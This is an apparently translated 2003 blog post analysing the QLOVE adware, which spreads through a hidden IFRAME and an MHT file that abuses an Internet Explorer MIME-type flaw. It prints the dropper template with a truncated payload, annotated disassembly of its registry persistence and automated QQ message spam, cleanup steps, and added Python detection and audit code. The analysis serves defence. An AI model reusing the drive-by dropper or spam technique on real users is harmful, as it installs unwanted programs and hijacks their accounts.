Diary of an Online Encounter with QLOVE

Created: 2003-05-24
Article type: original
Source: http://superlinux.yeah.net
Submitted by: linuxh4cker (linuxh4cker_at_yahoo.com.cn)

Author  : linuxh4cker
Email   : linuxh4cker@yahoo.com.cn
HomePage: http://superlinux.yeah.net

One day I was online looking at a QQ contact's profile when I suddenly noticed that QQ had sent a message by itself. I got a fright: could the famous "China Hacker" (中国黑客) have released a new version? That seemed impossible, though. In my view "China Hacker" is a textbook concept virus: it never opened any destructive functional interface and merely showed off its novel idea, and its QQ feature only typed patriotic slogans into the send window without actually sending them. Doubts started piling up.

After some digging I found that the site www.myxq.com was the biggest offender. Opening it gave me another fright, and then all sorts of XXX went up in smoke; sure enough, you are the biggest problem. Better to change the IE settings first: disable all ActiveX, scripting and anything else that looks suspicious, then reopen the page and look at the source. In less than a second an IFRAME was waving at me, and I was both excited and afraid. What on earth was the .mht file included by the IFRAME? I had to get to the bottom of it.

The site's page contains

<IFRAME src="http://ads.ourcode.net/qweb/MYXQWebAuto.mht" width=0 height=0></IFRAME>

and IE's default security level runs it automatically.

That is how it gets downloaded onto the user's machine. So what is this MHTML Document with the .mht extension? One look showed that it exploits the incorrect MIME header vulnerability. My machine had no patches at all, the perfect honeypot, and I was my own IDS; right, that is how she walked in so easily.

Let's take a look at her true face:

------------------------snap----------------------------------
Content-Type: multipart/related; type="multipart/alternative"; boundary="====B===="

--====B====
Content-Type: multipart/alternative; boundary="====A===="

--====A====
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<iframe src=3Dcid:Mud height=3D0 width=3D0> </iframe>
--====A====--

--====B====
Content-Type: audio/x-wav; name="qlove.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
... (omitted)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
--====B====
----------------snap---------------------------------

Sure enough, so familiar. So my machine should now hold the lovely file qlove.exe; a quick search found it. Judging by its size, hmm, it was probably written in assembly. Not convinced, I held the FI.exe magic mirror up to it: ah, it was actually VC. How uncreative. In this day and age someone still writes this kind of thing in VC; at the very least use Delphi, right?
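As an added example (not from the original article), a small Python check for the trick shown in the MHT above: it parses the MHTML as MIME, finds the part that an <iframe src=cid:...> points at, and reports it when the decoded payload starts with the MZ header even though the declared Content-Type claims something harmless such as audio/x-wav. The embedded sample is constructed from the listing above with the base64 body cut down to a 16-byte MZ stub.

```python
import email
import re

# Constructed sample modelled on the MHT shown on this page; the base64 body is
# trimmed to the first 16 bytes of a PE header (it starts with "MZ").
SAMPLE_MHT = """Content-Type: multipart/related; type="multipart/alternative"; boundary="====B===="

--====B====
Content-Type: multipart/alternative; boundary="====A===="

--====A====
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<iframe src=3Dcid:Mud height=3D0 width=3D0> </iframe>
--====A====--

--====B====
Content-Type: audio/x-wav; name="qlove.exe"
Content-Transfer-Encoding: base64
Content-ID: <Mud>

TVqQAAMAAAAEAAAA//8AAA==
--====B====--
"""

# An iframe whose src is a cid: reference into the same MHT document.
CID_RE = re.compile(r"""<iframe[^>]*\bsrc=["']?cid:([^"'\s>]+)""", re.I)


def find_mime_dropper(mht_text):
    """Return one finding per MIME part that (a) is referenced from an iframe via
    cid: and (b) decodes to data beginning with the MZ executable header.
    Each finding records the declared Content-Type so the mismatch is visible."""
    msg = email.message_from_string(mht_text)
    referenced = set()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            # quoted-printable is undone by decode=True, so =3D becomes "="
            html = part.get_payload(decode=True).decode("latin-1", "replace")
            referenced.update(c.lower() for c in CID_RE.findall(html))
    findings = []
    for part in msg.walk():
        cid = (part.get("Content-ID") or "").strip("<>").lower()
        if not cid or cid not in referenced:
            continue
        data = part.get_payload(decode=True) or b""
        if data[:2] == b"MZ":
            findings.append({"cid": cid, "declared": part.get_content_type(),
                             "name": part.get_filename(), "size": len(data)})
    return findings
```

On the sample this yields one finding: cid "mud", declared audio/x-wav, file name qlove.exe, 16 bytes of payload.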
Fine, at least it isn't written in assembly, so there are fewer junk instructions and fewer things to confuse me. Written in VC, heh, VC: any disassembler can eat you alive. So I picked up W32Dasm, which had been gathering dust for months. What, you say that is old-fashioned and everyone uses IDA now? I'm dizzy; actually my dynamic debugging toolkit has neither SoftICE nor TRW2000, and my favourite is TRV2.52. Ha, old-fashioned enough for you?

Back to the point: it should be disassembled to see what its functions really are.

So I sacrificed an hour of my PK time to do the thing nobody on earth wants to do. Analysis showed that this uninvited program... it isn't nice to call it a virus; nobody is born with the word "virus" written on them, and it would be unfair to condemn it in one stroke. Let's give it a chance to reform and call it by its own name, QLOVE.

Although in my eyes it isn't a virus, its methods are basically the same as a virus's: it still has an infection part, a propagation part and a self-protection part. The main functional modules from the disassembly are given below.

When run it automatically modifies WIN.INI, copies itself to the system directory under the name WebAuto, and modifies that registry location everyone on earth knows so that it runs automatically after system startup. Through the registry change it also sets IE's default page to www.myxq.com. At the same time, the assembly code below clears up the initial puzzle of why QQ sent messages by itself: it uses the keybd_event API function in USER32.DLL. And of course thanks go to QQ's shortcut key, which lets her promote her site by automatically sending QQ advertisements. Once you see the advertisement, the code on the homepage runs on your machine and then keeps serving her by spreading the advertisement; even if you have patched, your friends keep sending you this message. Isn't that annoying?

Disassembly analysis

Run part

* Possible StringData Ref from Data Obj ->"WebAuto"
|
:00401081 6820304000              push 00403020
:00401086 6A01                    push 00000001
:00401088 57                      push edi
:00401089 FF1518204000            Call dword ptr [00402018]   ; create the mutex "WebAuto"
:0040108F 85C0                    test eax, eax               ; NULL handle (creation failed)?
:00401091 746C                    je 004010FF                 ; if so, jump to the end

* Reference To: KERNEL32.GetLastError, Ord:011Ah
|
:00401093 FF1510204000            Call dword ptr [00402010]   ; get the error code
:00401099 3DB7000000              cmp eax, 000000B7           ; ERROR_ALREADY_EXISTS (0xB7): a copy is already running
:0040109E 745F                    je 004010FF                 ; if so, jump to the end

* Reference To: KERNEL32.Sleep, Ord:0296h
|
:004010A0 8B3514204000            mov esi, dword ptr [00402014]

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004010FD(U)
|
:004010A6 A14C324000              mov eax, dword ptr [0040324C]
:004010AB 40                      inc eax
:004010AC 83F828                  cmp eax, 00000028
:004010AF A34C324000              mov dword ptr [0040324C], eax
:004010B4 7E0B                    jle 004010C1                ; jump to the run routine
:004010B6 893D4C324000            mov dword ptr [0040324C], edi
:004010BC E89F050000              call 00401660               ; sleep

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004010B4(C)
|
:004010C1 E8DA000000              call 004011A0
:004010FF 5F                      pop edi                     ; restore the saved registers
:00401100 5E                      pop esi
:00401101 B801000000              mov eax, 00000001
:00401106 5B                      pop ebx
:00401107 C21000                  ret 0010                    ; return

Infection part: copies itself to the system directory and modifies WIN.INI and the registry

* Reference To: KERNEL32.GetSystemDirectoryA, Ord:0159h
|
:004011D0 FF151C204000            Call dword ptr [0040201C]   ; get the system directory
:004011D6 B940000000              mov ecx, 00000040
:004011DB 33C0                    xor eax, eax
:004011DD 8D7C2410                lea edi, dword ptr [esp+10]

* Possible StringData Ref from Data Obj ->"WebAuto.exe"
|
:004011E1 6880304000              push 00403080
:004011E6 F3                      repz
:004011E7 AB                      stosd
:004011E8 8D842414010000          lea eax, dword ptr [esp+00000114]
:004011EF 8D4C2414                lea ecx, dword ptr [esp+14]
:004011F3 50                      push eax

* Possible StringData Ref from Data Obj ->"%s\%s"
|
:004011F4 6878304000              push 00403078
:004011F9 51                      push ecx

* Reference To: MSVCRT.sprintf, Ord:02B2h
|
:004011FA FF15CC204000            Call dword ptr [004020CC]   ; build "<system dir>\WebAuto.exe"
:00401200 83C410                  add esp, 00000010
:00401203 8D542410                lea edx, dword ptr [esp+10]
:00401207 8D842410020000          lea eax, dword ptr [esp+00000210]
:0040120E 6A00                    push 00000000
:00401210 52                      push edx
:00401211 50                      push eax

* Reference To: KERNEL32.CopyFileA, Ord:0028h
|
:00401212 FF1520204000            Call dword ptr [00402020]   ; copy qlove.exe to the system directory,
                                                              ; renamed to WebAuto.exe

; Modify the registry so that the program starts with Windows and WebAuto.exe runs automatically.
; Also change IE's default start page to http://www.myxq.com

* Reference To: ADVAPI32.RegOpenKeyA, Ord:0171h
|
:00401218 8B1D04204000            mov ebx, dword ptr [00402004]
:0040121E 8D4C240C                lea ecx, dword ptr [esp+0C]
:00401222 51                      push ecx

* Possible StringData Ref from Data Obj ->"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
|
:00401223 6848304000              push 00403048
:00401228 6802000080              push 80000002               ; HKEY_LOCAL_MACHINE
:0040122D FFD3                    call ebx                    ; open the Run key
:0040122F 85C0                    test eax, eax
:00401231 740C                    je 0040123F                 ; opened successfully (eax == 0): jump to 0040123F
:00401233 5F                      pop edi                     ; otherwise return 0
:00401234 5E                      pop esi
:00401235 33C0                    xor eax, eax
:00401237 5B                      pop ebx
:00401238 81C404030000            add esp, 00000304
:0040123E C3                      ret
:0040123F 8B44240C                mov eax, dword ptr [esp+0C]

* Reference To: ADVAPI32.RegSetValueExA, Ord:0186h
|
:00401243 8B3500204000            mov esi, dword ptr [00402000]
:00401249 8D542410                lea edx, dword ptr [esp+10]
:0040124D 6800010000              push 00000100
:00401252 52                      push edx                    ; data: the full path built above
:00401253 6A01                    push 00000001               ; REG_SZ
:00401255 6A00                    push 00000000

* Possible StringData Ref from Data Obj ->"WebAuto.exe"
|
:00401257 6880304000              push 00403080
:0040125C 50                      push eax
:0040125D FFD6                    call esi                    ; set the value WebAuto.exe
:0040125F 8B4C240C                mov ecx, dword ptr [esp+0C]

* Reference To: ADVAPI32.RegCloseKey, Ord:015Bh
|
:00401263 8B3D08204000            mov edi, dword ptr [00402008]
:00401269 51                      push ecx
:0040126A FFD7                    call edi                    ; close the key
:0040126C 8D54240C                lea edx, dword ptr [esp+0C]
:00401270 52                      push edx

* Possible StringData Ref from Data Obj ->"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
|
:00401271 6848304000              push 00403048
:00401276 6801000080              push 80000001               ; HKEY_CURRENT_USER
:0040127B FFD3                    call ebx                    ; open the same key again, this time under HKCU
:0040127D 85C0                    test eax, eax
:0040127F 740C                    je 0040128D                 ; opened successfully: jump to 0040128D
:00401281 5F                      pop edi
:00401282 5E                      pop esi
:00401283 33C0                    xor eax, eax
:00401285 5B                      pop ebx
:00401286 81C404030000            add esp, 00000304
:0040128C C3                      ret

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040127F(C)
|
:0040128D 8B4C240C                mov ecx, dword ptr [esp+0C]
:00401291 8D442410                lea eax, dword ptr [esp+10]
:00401295 6800010000              push 00000100
:0040129A 50                      push eax
:0040129B 6A01                    push 00000001               ; REG_SZ
:0040129D 6A00                    push 00000000

* Possible StringData Ref from Data Obj ->"WebAuto.exe"
|
:0040129F 6880304000              push 00403080
:004012A4 51                      push ecx
:004012A5 FFD6                    call esi                    ; set the value WebAuto.exe
:004012A7 8B54240C                mov edx, dword ptr [esp+0C]
:004012AB 52                      push edx
:004012AC FFD7                    call edi                    ; close the key
:004012AE 5F                      pop edi
:004012AF 5E                      pop esi
:004012B0 B801000000              mov eax, 00000001
:004012B5 5B                      pop ebx
:004012B6 81C404030000            add esp, 00000304
:004012BC C3                      ret

:004013A5 8D4C2408                lea ecx, dword ptr [esp+08]
:004013A9 51                      push ecx

* Possible StringData Ref from Data Obj ->"Software\Microsoft\Internet Explorer\Main"
|
:004013AA 6898304000              push 00403098
:004013AF 6801000080              push 80000001               ; HKEY_CURRENT_USER

* Reference To: ADVAPI32.RegOpenKeyA, Ord:0171h
|
:004013B4 FF1504204000            Call dword ptr [00402004]   ; open Software\Microsoft\Internet Explorer\Main
:004013BA 5F                      pop edi
:004013BB 5E                      pop esi
:004013BC 85C0                    test eax, eax
:004013BE 742E                    je 004013EE                 ; opened successfully: jump to 004013EE

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004013BE(C)
|
:004013EE 8B442400                mov eax, dword ptr [esp]
:004013F2 8D542404                lea edx, dword ptr [esp+04]
:004013F6 6800010000              push 00000100
:004013FB 52                      push edx
:004013FC 6A01                    push 00000001               ; REG_SZ
:004013FE 6A00                    push 00000000

* Possible StringData Ref from Data Obj ->"Start Page"
|
:00401400 688C304000              push 0040308C
:00401405 50                      push eax

* Reference To: ADVAPI32.RegSetValueExA, Ord:0186h
|
:00401406 FF1500204000            Call dword ptr [00402000]   ; set IE's default start page ("Start Page")
:0040140C 8B4C2400                mov ecx, dword ptr [esp]    ; the value is www.myxq.com
:00401410 51                      push ecx

* Reference To: ADVAPI32.RegCloseKey, Ord:015Bh
|
:00401411 FF1508204000            Call dword ptr [00402008]   ; close the key

; The following part modifies WIN.INI
; and runs EXEAuto.exe

* Possible StringData Ref from Data Obj ->"CurTime"
|
:00401691 6810324000              push 00403210

* Possible StringData Ref from Data Obj ->"AutoTime"
|
:00401696 6804324000              push 00403204
:0040169B 894DD8                  mov dword ptr [ebp-28], ecx

* Reference To: KERNEL32.GetProfileIntA, Ord:0147h
|
:0040169E FF1528204000            Call dword ptr [00402028]   ; read the integer entry CurTime from
                                                              ; section [AutoTime] of win.ini

:00401717 8D95B4FDFFFF            lea edx, dword ptr [ebp+FFFFFDB4]
:0040171D 6800010000              push 00000100
:00401722 52                      push edx

* Reference To: KERNEL32.GetSystemDirectoryA, Ord:0159h
|
:00401723 FF151C204000            Call dword ptr [0040201C]   ; get the system directory
:00401729 B940000000              mov ecx, 00000040
:0040172E 33C0                    xor eax, eax
:00401730 8DBDB4FEFFFF            lea edi, dword ptr [ebp+FFFFFEB4]

* Possible StringData Ref from Data Obj ->"EXEAuto.exe"
|
:00401736 68C0314000              push 004031C0
:0040173B F3                      repz
:0040173C AB                      stosd
:0040173D 8D85B4FDFFFF            lea eax, dword ptr [ebp+FFFFFDB4]
:00401743 8D8DB4FEFFFF            lea ecx, dword ptr [ebp+FFFFFEB4]
:00401749 50                      push eax

* Possible StringData Ref from Data Obj ->"%s\%s"
|
:0040174A 6878304000              push 00403078
:0040174F 51                      push ecx

* Reference To: MSVCRT.sprintf, Ord:02B2h
|
:00401750 FF15CC204000            Call dword ptr [004020CC]   ; build "<system dir>\EXEAuto.exe"

* Possible StringData Ref from Data Obj ->"CurTime"
|
:004018D6 6810324000              push 00403210

* Possible StringData Ref from Data Obj ->"AutoTime"
|
:004018DB 6804324000              push 00403204

* Reference To: KERNEL32.WriteProfileStringA, Ord:02EDh
|
:004018E0 FF1524204000            Call dword ptr [00402024]   ; write the string entry CurTime into
                                                              ; section [AutoTime] of win.ini
:004018E6 6A00                    push 00000000
:004018E8 6A00                    push 00000000
:004018EA 8D85B4FEFFFF            lea eax, dword ptr [ebp+FFFFFEB4]
:004018F0 6A00                    push 00000000
:004018F2 50                      push eax                    ; the file to run through its associated program
:004018F3 6A00                    push 00000000
:004018F5 6A00                    push 00000000

* Reference To: SHELL32.ShellExecuteA, Ord:0072h
|
:004018F7 FF15E4204000            Call dword ptr [004020E4]   ; execute via the associated program

Propagation part: advertises by sending QQ messages

:00401052 33FF                    xor edi, edi
:00401054 C7055032400060EA0000    mov dword ptr [00403250], 0000EA60
:0040105E 8B442410                mov eax, dword ptr [esp+10]
:00401062 57                      push edi
:00401063 893D4C324000            mov dword ptr [0040324C], edi
:00401069 893D48324000            mov dword ptr [00403248], edi
:0040106F A340324000              mov dword ptr [00403240], eax

* Reference To: USER32.GetActiveWindow, Ord:00DDh              ; get the handle of the active window
|
:00401074 FF15F4204000            Call dword ptr [004020F4]
:0040107A 50                      push eax

* Reference To: USER32.ShowWindow, Ord:026Ah                   ; control the window's visibility
|
:0040107B FF15F8204000            Call dword ptr [004020F8]

:00401468 53                      push ebx

* Reference To: USER32.FindWindowExA, Ord:00D6h
|
:00401469 8B1DFC204000            mov ebx, dword ptr [004020FC]
:0040146F 56                      push esi
:00401470 57                      push edi

* Possible StringData Ref from Data Obj ->"发送消息"
|
:00401471 6880314000              push 00403180
:00401476 6A00                    push 00000000
:00401478 6A00                    push 00000000
:0040147A 6A00                    push 00000000
:0040147C FFD3                    call ebx                    ; find the handle of QQ's "发送消息" (send message) window
:0040147E 8BF0                    mov esi, eax
:00401480 85F6                    test esi, esi
:00401482 751C                    jne 004014A0                ; found: jump to 004014A0
:00401484 C70550324000F4010000    mov dword ptr [00403250], 000001F4
:0040148E 8B4C2420                mov ecx, dword ptr [esp+20]
:00401492 64890D00000000          mov dword ptr fs:[00000000], ecx
:00401499 5F                      pop edi
:0040149A 5E                      pop esi
:0040149B 5B                      pop ebx
:0040149C 83C420                  add esp, 00000020
:0040149F C3                      ret

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401482(C)
|
:004014A0 6A00                    push 00000000

* Possible StringData Ref from Data Obj ->"RICHEDIT"
|
:004014A2 6874314000              push 00403174
:004014A7 6A00                    push 00000000
:004014A9 56                      push esi
:004014AA FFD3                    call ebx                    ; find the handle of QQ's RICHEDIT-class edit window
:004014AC 8BF8                    mov edi, eax
:004014AE 85FF                    test edi, edi
:004014B0 7512                    jne 004014C4                ; found: jump to 004014C4
:004014B2 8B4C2420                mov ecx, dword ptr [esp+20]
:004014B6 64890D00000000          mov dword ptr fs:[00000000], ecx
:004014BD 5F                      pop edi
:004014BE 5E                      pop esi
:004014BF 5B                      pop ebx
:004014C0 83C420                  add esp, 00000020
:004014C3 C3                      ret

* Possible StringData Ref from Data Obj ->"送讯息(&S)"
|
:004014C4 6868314000              push 00403168

* Possible StringData Ref from Data Obj ->"BUTTON"
|
:004014C9 6860314000              push 00403160
:004014CE 6A00                    push 00000000
:004014D0 56                      push esi
:004014D1 FFD3                    call ebx                    ; find the handle of QQ's "送讯息(&S)" (send) button
:004014D3 85C0                    test eax, eax
:004014D5 7512                    jne 004014E9                ; found: jump to 004014E9
:004014D7 8B4C2420                mov ecx, dword ptr [esp+20]
:004014DB 64890D00000000          mov dword ptr fs:[00000000], ecx
:004014E2 5F                      pop edi
:004014E3 5E                      pop esi
:004014E4 5B                      pop ebx
:004014E5 83C420                  add esp, 00000020
:004014E8 C3                      ret

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004014D5(C)
|
:004014E9 8D4C2410                lea ecx, dword ptr [esp+10]

:004015C1 50                      push eax                    ; lParam
:004015C2 6A00                    push 00000000               ; wParam
:004015C4 6A0C                    push 0000000C               ; message identifier (WM_SETTEXT = 0x000C)
:004015C6 57                      push edi                    ; handle of the window receiving the message

* Reference To: USER32.SendMessageA, Ord:0214h
|
:004015C7 FF15F0204000            Call dword ptr [004020F0]   ; send the message
:004015CD 56                      push esi

* Reference To: USER32.SetForegroundWindow, Ord:0230h
|
:004015CE FF15EC204000            Call dword ptr [004020EC]   ; make the window the system's foreground window

* Reference To: USER32.keybd_event, Ord:02AAh
|
:004015D4 8B3500214000            mov esi, dword ptr [00402100]
:004015DA 6A00                    push 00000000               ; dwExtraInfo
:004015DC 6A01                    push 00000001               ; dwFlags, 1 = extended key (KEYEVENTF_EXTENDEDKEY)
:004015DE 6A45                    push 00000045               ; bScan, the key's OEM scan code
:004015E0 6A11                    push 00000011               ; bVk, virtual-key code: simulate CONTROL
:004015E2 FFD6                    call esi                    ; simulated keystroke
:004015E4 6A00                    push 00000000
:004015E6 6A01                    push 00000001
:004015E8 6A45                    push 00000045
:004015EA 6A0D                    push 0000000D               ; RETURN (Enter)
:004015EC FFD6                    call esi                    ; simulated keystroke
:004015EE 6A00                    push 00000000
:004015F0 6A03                    push 00000003               ; dwFlags 3 = extended key + key up (KEYEVENTF_KEYUP)
:004015F2 6A45                    push 00000045
:004015F4 6A11                    push 00000011               ; simulate CONTROL
:004015F6 FFD6                    call esi                    ; simulated keystroke
:004015F8 6A00                    push 00000000
:004015FA 6A03                    push 00000003
:004015FC 6A45                    push 00000045
:004015FE 6A0D                    push 0000000D               ; RETURN (Enter)
:00401600 FFD6                    call esi                    ; simulated keystroke

; This series of simulated keystrokes is nothing more than QQ's send shortcut (Ctrl+Enter)

By now you should know how to defend against it. Patch what needs patching, and if you were unlucky enough to be infected, delete the leftover junk from your registry. For people like me who don't like patching, open IE and choose Tools -> Internet Options -> Security -> Custom Level -> "Launching programs and files in an IFRAME" -> Disable, and that's it.

Removing the junk:

Delete MYXQWebAuto.mht, qlove.exe and WebAuto.exe in the system directory
Remove the WebAuto.exe value from HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Remove the WebAuto.exe value from HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Clear the Start Page value in HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Clear the Start Page value in HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main

Note that the WebAuto.exe process has to be killed first; it can be killed straight from the taskbar. That is also why I say this doesn't count as a virus: the author didn't register it as a service, didn't hide the process, and didn't use three-thread protection like "China Hacker". Whether the program gets upgraded with those features after I point this out, ha, is not my business.
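As an added example (not part of the article), the cleanup list above expressed as an audit over a registry snapshot, the text of WIN.INI and a file listing; the function only reports what it finds and what the article says to do about it, so it can be checked against a constructed snapshot before anything is deleted. The snapshot shape {key path: {value name: data}} is my assumption; on a live host it would be filled from winreg or a reg.exe export, and the sample values below are constructed.

```python
import configparser

# Persistence artefacts this page lists for cleanup (registry paths as reg.exe exports them).
RUN_KEYS = (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
            r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run")
IE_MAIN_KEYS = (r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main",
                r"HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main")
DROPPED_FILES = {"webauto.exe", "qlove.exe", "myxqwebauto.mht"}


def audit_qlove(registry, win_ini_text, file_names):
    """registry: {key_path: {value_name: data}} snapshot (assumed shape); win_ini_text:
    contents of WIN.INI; file_names: names found in the system directory and IE cache.
    Returns (location, action) pairs; an empty list means no QLOVE artefact was found."""
    findings = []
    for name in sorted(file_names):  # the running process must be killed before deleting
        if name.lower() in DROPPED_FILES:
            findings.append((name, "terminate WebAuto.exe, then delete the file"))
    for key in RUN_KEYS:  # the dropper writes a value named WebAuto.exe under both hives
        for name, data in registry.get(key, {}).items():
            if name.lower() == "webauto.exe" or "webauto.exe" in str(data).lower():
                findings.append((key + "\\" + name + " = " + str(data), "delete the Run value"))
    for key in IE_MAIN_KEYS:  # Start Page was pointed at www.myxq.com
        start = str(registry.get(key, {}).get("Start Page", ""))
        if "myxq.com" in start.lower():
            findings.append((key + "\\Start Page = " + start, "reset Start Page"))
    # [AutoTime] CurTime is the entry the GetProfileIntA/WriteProfileStringA calls touch
    ini = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    ini.read_string(win_ini_text)
    if ini.has_option("AutoTime", "CurTime"):
        findings.append(("win.ini [AutoTime] CurTime", "remove the section the dropper wrote"))
    return findings


# Constructed snapshot of an infected host, matching what the disassembly above writes.
SAMPLE_REGISTRY = {RUN_KEYS[0]: {"WebAuto.exe": r"C:\WINNT\System32\WebAuto.exe"},
                   IE_MAIN_KEYS[0]: {"Start Page": "http://www.myxq.com"}}
SAMPLE_WIN_INI = "[windows]\nload=\n[AutoTime]\nCurTime=12345\n"
SAMPLE_FILES = ["notepad.exe", "WebAuto.exe", "MYXQWebAuto.mht"]
```

Run against the sample it lists the two dropped files, the HKLM Run value, the HKCU Start Page and the win.ini section; a clean snapshot yields an empty list.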